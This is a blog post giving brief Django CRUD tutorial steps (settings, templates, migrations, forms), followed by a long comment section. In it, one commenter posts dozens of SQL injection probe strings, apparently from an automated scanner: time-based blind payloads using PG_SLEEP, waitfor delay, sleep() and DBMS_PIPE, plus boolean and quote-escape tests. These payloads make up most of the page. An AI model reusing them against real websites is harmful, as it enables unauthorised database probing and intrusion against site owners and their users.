Django Project Deploy in cpenal
Oct 20, 2022
CRUD can be best explained as an approach to building a Django web application. In general CRUD means performing Create, Retrieve, Update and Delete operations on a table in a database. First follow the steps of installation from previous post Django Installation Steps
CRUD Application
Make sure file sequence first.
Make changing in setting.py for static and templates folders and also add app
STATIC_URL = '/static/'
STATICFILES_DIRS = [BASE_DIR / "static",]
STATIC_ROOT = "/static/"
After that make a file name file.txt in static folder and then access by url 127.0.0.1/static/file.txt
Make three html pages and add bootstrap folder in static
Base.html
Addandshow.html
This can be used for serial number
{{ forloop.counter }} # starting index 1
{{ forloop.counter0 }} # starting index 0
For inline the buttons, we use:
class="d-inline"
updatestudent.html
Make models in models.py
Add in admin.py to register Model
These are must after creating model
python manage.py makemigrations
python manage.py migrate
python manage.py createsuperuser
And check the table in admin
Make form in forms.py
Urls.py
Add views.py
There is an option of clean data before enter in database
Important info
In forms add autocomplete="off". This is useful when after submisstion press back button.
<form action="" method="POST" enctype="multipart/form-data" class="form-material form-horizontal" autocomplete="off">
Please share this page to friends.
Welcome to our Software Solutions Company, where we excel in transforming ideas into tangible realities. We have expertise in developing online management systems, website designing & development, software solutions, mobile app development, e-commerce solutions and graphic designing. We provide 24/7 services.
pHqghUme
Oct 29, 2024
@@k4MVd
pHqghUme
Oct 29, 2024
����%2527%2522\'\"
pHqghUme
Oct 29, 2024
'"
pHqghUme
Oct 29, 2024
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme
Oct 29, 2024
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme
Oct 29, 2024
gGwAfdoI')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
SQEsoGKj') OR 14=(SELECT 14 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
rHnxnpQg' OR 264=(SELECT 264 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1)) OR 219=(SELECT 219 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1) OR 115=(SELECT 115 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1 OR 929=(SELECT 929 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
PkZGkuL2'; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1 waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1); waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme
Oct 29, 2024
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme
Oct 29, 2024
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme
Oct 29, 2024
*if(now()=sysdate(),sleep(15),0)
pHqghUme
Oct 29, 2024
-1" OR 3+467-467-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1" OR 2+467-467-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 3+888-888-1=0+0+0+1 or 'wSTQxeGx'='
pHqghUme
Oct 29, 2024
-1' OR 2+888-888-1=0+0+0+1 or 'wSTQxeGx'='
pHqghUme
Oct 29, 2024
-1' OR 3+687-687-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 2+687-687-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 3+465-465-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 2+465-465-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 3+551-551-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 2+551-551-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
yBKXcbHc
pHqghUme
Oct 29, 2024
@@swokN
pHqghUme
Oct 29, 2024
����%2527%2522\'\"
pHqghUme
Oct 29, 2024
'"
pHqghUme
Oct 29, 2024
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme
Oct 29, 2024
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme
Oct 29, 2024
DA4dTHXm')) OR 632=(SELECT 632 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
SRkj9RNf') OR 727=(SELECT 727 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
7rEYs5xm' OR 99=(SELECT 99 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1) OR 225=(SELECT 225 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1 OR 656=(SELECT 656 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
78cyYDlr'; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
@@how9i
pHqghUme
Oct 29, 2024
-1 waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
����%2527%2522\'\"
pHqghUme
Oct 29, 2024
'"
pHqghUme
Oct 29, 2024
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme
Oct 29, 2024
-1); waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme
Oct 29, 2024
-1; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
Ml6Hvtzw')) OR 998=(SELECT 998 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme
Oct 29, 2024
QpPAeV2H') OR 34=(SELECT 34 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme
Oct 29, 2024
RfWlA9z8' OR 771=(SELECT 771 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme
Oct 29, 2024
-1)) OR 700=(SELECT 700 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
*if(now()=sysdate(),sleep(15),0)
pHqghUme
Oct 29, 2024
-1) OR 979=(SELECT 979 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1" OR 3+836-836-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 311=(SELECT 311 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1" OR 2+836-836-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 3+622-622-1=0+0+0+1 or 'jUoASe6W'='
pHqghUme
Oct 29, 2024
-1' OR 2+622-622-1=0+0+0+1 or 'jUoASe6W'='
pHqghUme
Oct 29, 2024
-1' OR 3+574-574-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 2+574-574-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 3+932-932-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 2+932-932-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 3+847-847-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 2+847-847-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
BB4cZSTT'; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1 waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1); waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme
Oct 29, 2024
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme
Oct 29, 2024
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme
Oct 29, 2024
*if(now()=sysdate(),sleep(15),0)
pHqghUme
Oct 29, 2024
-1" OR 3+408-408-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1" OR 2+408-408-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 3+752-752-1=0+0+0+1 or '5SUC3JA1'='
pHqghUme
Oct 29, 2024
-1' OR 2+752-752-1=0+0+0+1 or '5SUC3JA1'='
pHqghUme
Oct 29, 2024
-1' OR 3+392-392-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 2+392-392-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 3+75-75-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 2+75-75-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 3+616-616-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 2+616-616-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
E2fhbvpL
pHqghUme
Oct 29, 2024
@@BJXmg
pHqghUme
Oct 29, 2024
����%2527%2522\'\"
pHqghUme
Oct 29, 2024
'"
pHqghUme
Oct 29, 2024
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme
Oct 29, 2024
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme
Oct 29, 2024
udbEQ7Bm')) OR 937=(SELECT 937 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
LmdHl0Sk') OR 91=(SELECT 91 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
v6v5Z5ez' OR 800=(SELECT 800 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1)) OR 53=(SELECT 53 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1) OR 148=(SELECT 148 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
-1 OR 939=(SELECT 939 FROM PG_SLEEP(15))--
pHqghUme
Oct 29, 2024
qpMmBxx0'; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1 waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1); waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
-1; waitfor delay '0:0:15' --
pHqghUme
Oct 29, 2024
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme
Oct 29, 2024
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme
Oct 29, 2024
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme
Oct 29, 2024
*if(now()=sysdate(),sleep(15),0)
pHqghUme
Oct 29, 2024
-1" OR 3+651-651-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1" OR 2+651-651-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 3+517-517-1=0+0+0+1 or 'pgjEGR5O'='
pHqghUme
Oct 29, 2024
-1' OR 2+517-517-1=0+0+0+1 or 'pgjEGR5O'='
pHqghUme
Oct 29, 2024
-1' OR 3+245-245-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1' OR 2+245-245-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 3+779-779-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 2+779-779-1=0+0+0+1
pHqghUme
Oct 29, 2024
-1 OR 3+273-273-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
-1 OR 2+273-273-1=0+0+0+1 --
pHqghUme
Oct 29, 2024
GJiAVarx